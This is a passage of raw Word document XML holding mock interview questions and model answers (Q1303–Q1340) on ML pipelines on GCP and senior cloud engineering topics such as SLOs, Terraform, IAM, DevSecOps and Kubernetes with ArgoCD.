      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Provide model version, code commit, training dataset version, feature definitions, pipeline run ID, parameters, metrics, approval record, deployment timestamp, endpoint version, and monitoring history. Also include IAM/audit logs and artifact locations. The goal is to prove how the model was created, approved, deployed, and monitored.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1303. How do you use Pub/Sub in ML systems?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pub/Sub can trigger event-driven pipelines, stream prediction requests, decouple producers and consumers, and support asynchronous inference workflows. It is useful when workloads need buffering, retries, and scalable processing. Design idempotent consumers and dead-letter handling for reliability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1304. Scenario: An async inference pipeline using Pub/Sub is producing duplicate predictions. How would you fix it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pub/Sub can deliver messages more than once, so consumers must be idempotent. Use message IDs, request IDs, output deduplication keys, and transactional writes where possible. Also review ack deadlines, retries, dead-letter topics, and downstream failure behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1305. How would you monitor an ML pipeline on GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Monitor pipeline success/failure, step duration, data volume, schema validity, feature freshness, training metrics, model evaluation, deployment status, prediction quality, cost, and infrastructure health. Use Cloud Logging, Cloud Monitoring, pipeline metadata, dashboards, and alerts. Include runbooks for failed steps and degraded model quality.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1306. Scenario: A model training pipeline succeeds but the deployed model gives bad predictions. What could be wrong?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Possible causes include bad training data, wrong labels, feature leakage, training-serving skew, incorrect preprocessing, model artifact mismatch, wrong endpoint version, schema changes, or missing post-deployment validation. Debug by comparing pipeline artifacts, evaluation metrics, sample predictions, feature values, and deployment configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1307. How would you design CI/CD for ML models on GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use CI for code tests, data validation tests, pipeline component tests, container scans, and Terraform validation. Use CD for pipeline execution, model evaluation, registry approval, staged deployment, canary rollout, monitoring checks, and rollback. ML CI/CD must validate code, data, model quality, and infrastructure together.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1308. Scenario: You need to deploy an ML model globally with low latency. What tradeoffs do you consider?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Consider user regions, model size, endpoint regions, data residency, replicated serving, global load balancing, cache strategy, consistency, monitoring, and cost. Multi-region serving improves latency and resilience but increases operational complexity. Sensitive data may limit where predictions can be processed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1309. Design a production-grade GCP ML platform for multiple teams.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A production-grade GCP ML platform should include BigQuery or Cloud Storage for data, Vertex AI Pipelines for orchestration, custom training or AutoML, model registry, approval workflows, online and batch serving, monitoring, feature governance, IAM, audit logging, cost controls, and CI/CD. It should provide reusable templates and guardrails so teams can ship models safely without rebuilding the platform each time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>JD-Specific Senior Cloud Engineering Mock Interview Questions (1121-1180)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1310. How would you explain the role of a Senior Cloud Engineer in improving production reliability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Senior Cloud Engineer improves production reliability by combining cloud architecture, automation, observability, incident response, and SRE practices. The role is not only to deploy infrastructure but also to reduce incident frequency, improve availability, define SLOs and SLIs, automate runbooks, and make delivery safer through CI/CD, IaC, and DevSecOps controls. A strong answer should connect engineering decisions to customer impact, service quality, and operational efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1311. Scenario: Incident volume is increasing across a cloud platform. How would you reduce both volume and severity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start by classifying incidents by service, severity, root cause, repeat pattern, and customer impact. Then identify top recurring causes such as bad deployments, capacity issues, missing alerts, flaky dependencies, manual changes, or configuration drift. Fixes may include better deployment gates, autoscaling, runbooks, SLO-based alerts, Terraform standardization, automated remediation, and post-incident action tracking. Measure progress using incident count, MTTR, change failure rate, and error budget burn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1312. How do you define SLIs and SLOs for a business-critical application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start from user-visible journeys such as login, payment, search, API requests, or claims processing. Choose SLIs that reflect customer experience, such as availability, latency, error rate, freshness, or correctness. Define SLO targets based on business criticality, historical performance, dependency limits, and cost. Avoid vanity metrics; SLOs should drive alerting, error budgets, release decisions, and reliability investment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1313. Scenario: A service has many alerts but users are not affected. What would you do?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Review whether alerts are tied to user-impacting SLIs or low-level symptoms. Remove noisy alerts, tune thresholds, add burn-rate alerts, and route warnings separately from pages. Keep alerts actionable with clear owners and runbooks. The goal is to reduce alert fatigue while preserving fast detection of real customer impact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1314. How do DORA metrics help improve DevOps maturity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: DORA metrics measure deployment frequency, lead time for change, change failure rate, and time to restore service. They help teams understand delivery speed and stability together. For a senior role, explain how to use them to find bottlenecks, improve CI/CD, reduce risky changes, and move toward smaller, safer, more frequent releases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1315. Scenario: The JD expects weekly deployments or better. How would you improve a team deploying once per month?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Break large releases into smaller changes, improve automated tests, standardize branching, adopt trunk-based development where possible, automate build and deployment, add feature flags, and improve rollback. Track lead time, deployment frequency, change failure rate, and blocked PRs. The goal is not speed alone; it is frequent, low-risk delivery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1316. How would you implement trunk-based development in a regulated environment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use short-lived branches, frequent merges, mandatory pull request checks, automated tests, code owners, static analysis, security scans, and deployment approvals for production. Feature flags separate code integration from feature release. In regulated environments, keep audit trails, change tickets where required, and evidence from CI/CD pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1317. Scenario: A team has inconsistent branching and release practices. How would you standardize them?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Document a simple workflow, align it with CI/CD gates, train teams, and enforce critical controls in repositories. Define branch naming, PR review rules, release tagging, semantic versioning, artifact promotion, rollback, and hotfix process. Standardization should reduce confusion and improve auditability without slowing teams unnecessarily.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1318. How do you design a CI/CD pipeline for cloud applications using GitHub, Cloud Build, Artifactory, and ArgoCD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use GitHub for source control and pull request checks, Cloud Build or GitHub Actions for build/test/security stages, Artifactory for immutable artifacts, and ArgoCD for GitOps deployment to Kubernetes. The pipeline should include unit tests, integration tests, IaC validation, image scanning, SBOM generation, artifact signing where possible, deployment approvals, progressive rollout, and rollback.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1319. Scenario: A deployment through ArgoCD is stuck OutOfSync. How would you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check the ArgoCD application status, sync errors, target revision, repository access, generated manifests, Helm/Kustomize values, Kubernetes events, RBAC permissions, admission policy failures, and resource health. Compare desired state in Git with live state in the cluster. Avoid manual fixes unless needed for emergency mitigation, then reconcile the source of truth in Git.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1320. How do you use Infrastructure as Code consistently across cloud environments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use reusable Terraform modules, remote state, version pinning, code review, policy checks, environment separation, naming/tagging standards, and CI validation. Avoid console changes except for emergency break-glass scenarios. Consistency comes from modules, golden paths, documentation, and automated enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1321. Scenario: Terraform drift is causing production uncertainty. What process would you introduce?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Run scheduled drift detection, restrict manual permissions, review audit logs, and classify drift as intentional or accidental. Reconcile by importing approved changes, reverting unauthorized changes, or updating Terraform code. Add governance controls such as IAM restrictions, policy-as-code, and documented emergency change procedures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1322. How would you structure Terraform modules for a cloud platform team?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Create small, composable modules for networking, IAM, Kubernetes clusters, service accounts, storage, databases, monitoring, and application deployment patterns. Version modules, document inputs and outputs, include examples, validate with CI, and avoid overly generic modules that hide risk. Modules should make secure, compliant infrastructure easy to consume.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1323. Scenario: Terraform wants to replace a production resource. How do you handle it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Stop and inspect the plan carefully. Identify whether the change is caused by code, provider version, drift, immutable field change, state issue, or module refactor. Use lifecycle protections for critical resources, create migration plans, take backups, test in lower environments, and get approval before any destructive action. Never blindly apply a risky production plan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1324. How do you secure Terraform state?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Store state remotely with restricted IAM, encryption, versioning, and access logging. Separate state by environment and ownership boundary. Avoid storing secrets directly in Terraform state where possible, and never expose sensitive outputs. Use CI-controlled applies and review state access periodically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1325. Scenario: A Terraform pipeline passes locally but fails in CI. What would you check?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check Terraform version, provider lock file, backend credentials, workspace selection, environment variables, service account permissions, network access, module source access, and whether CI runs from the expected directory. Make CI the repeatable source of truth by pinning versions and documenting required inputs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1326. How would you design cloud governance for naming, tagging, and policy controls?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Define naming standards for projects, resources, environments, regions, and ownership. Require tags or labels for owner, cost center, application, environment, data classification, and compliance. Enforce critical controls using org policies, policy-as-code, CI checks, and cloud-native policy tools. Governance should improve visibility and reduce risk, not become only documentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1327. Scenario: Many cloud resources have no owner or cost tags. What would you do?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Create an inventory, identify high-cost and high-risk resources, map ownership using logs, billing data, repositories, and deployment pipelines, then enforce tagging on new resources. For existing resources, run a remediation campaign with deadlines. Add policy checks in Terraform and CI/CD to prevent recurrence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1328. How do you implement least privilege IAM in GCP and Azure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with role-based access by persona and workload, avoid broad roles such as Owner, use service accounts or managed identities, separate duties, and apply access at the narrowest practical scope. Review permissions regularly, use groups, audit logs, conditional access where appropriate, and break-glass access for emergencies. For workloads, prefer short-lived identity federation over long-lived keys.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1329. Scenario: A production service account has excessive permissions. How would you remediate safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First identify actual permission usage from audit logs and service behavior. Create a least-privilege replacement role or binding, test in lower environments, roll out gradually, monitor errors, and remove broad access after validation. Communicate the change and keep rollback steps ready.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1330. How do you embed DevSecOps controls into CI/CD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Add dependency scanning, secret scanning, SAST, container image scanning, IaC scanning, license checks, SBOM generation, policy checks, and deployment gates. Fail builds for high-severity issues based on agreed policy, but provide clear remediation guidance. Security should shift left while still supporting fast delivery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1331. Scenario: A secret is found in a Git repository. What immediate and long-term steps do you take?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Revoke and rotate the secret immediately, assess exposure through logs and repository access, remove it from current code and history where required, and notify security if needed. Long term, add secret scanning, pre-commit hooks, secure secret managers, developer training, and least-privilege credentials with short lifetimes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1332. How do you conduct a cloud security review?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Review IAM, network exposure, encryption, secret handling, logging, vulnerability posture, backup, data classification, policy compliance, and incident response readiness. Use automated tools plus manual architecture review and threat modeling. Produce prioritized findings with owners, timelines, and risk context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1333. Scenario: A vulnerability scan blocks a production release. How would you respond?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Assess severity, exploitability, exposure, compensating controls, and business impact. If risk is high, block or delay release and remediate. If the finding is lower risk or false positive, document the exception, approval, expiry, and mitigation. A senior answer balances security, delivery, and customer impact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1334. How do you design observability for distributed systems?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use metrics, logs, traces, events, and synthetic checks tied to user journeys. Standardize dashboards, correlation IDs, structured logging, RED/USE metrics, SLO burn-rate alerts, and runbooks. Observability should help teams detect, debug, and explain production behavior quickly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1335. Scenario: Users report slowness but infrastructure dashboards look normal. What would you check?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check application latency percentiles, dependency latency, database queries, DNS, load balancer metrics, client-side errors, regional routing, queue depth, thread pools, connection pools, and trace spans. Infrastructure metrics can look healthy while application or dependency behavior is degraded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1336. How would you implement monitoring, logging, and alerting for Kubernetes applications?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Collect cluster metrics, node metrics, pod metrics, application metrics, Kubernetes events, container logs, and traces. Alert on SLO burn, crash loops, pending pods, resource saturation, deployment failures, and dependency errors. Use dashboards by service and runbooks for common incidents.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1337. Scenario: Kubernetes pods are restarting after a release. How would you troubleshoot?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check rollout history, pod events, container logs, exit codes, probes, resource limits, config maps, secrets, image version, dependency connectivity, and recent code changes. If customer impact is high, rollback first and continue diagnosis from evidence. Add tests or deployment checks to prevent recurrence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1338. How do you design Kubernetes deployment orchestration with ArgoCD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Keep manifests, Helm charts, or Kustomize overlays in Git. ArgoCD reconciles desired state to clusters with application health checks, sync waves, environment overlays, RBAC, and deployment approvals. Use progressive delivery tools if needed for canary or blue-green. Git should provide auditability and rollback.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1339. Scenario: A Kubernetes deployment succeeds but traffic still goes to the old version. What would you check?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check Service selectors, labels, EndpointSlices, ingress configuration, load balancer health checks, service mesh routing, DNS cache, ArgoCD state, and whether pods are ready. Also confirm the new version is actually serving and not failing readiness checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1340. How would you design Kubernetes clusters for high availability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use regional or multi-zone clusters, multiple node pools, pod anti-affinity, topology spread constraints, PodDisruptionBudgets, readiness probes, autoscaling, backups for stateful components, and controlled upgrades. Avoid single points of failure in ingress, DNS, storage, and external dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
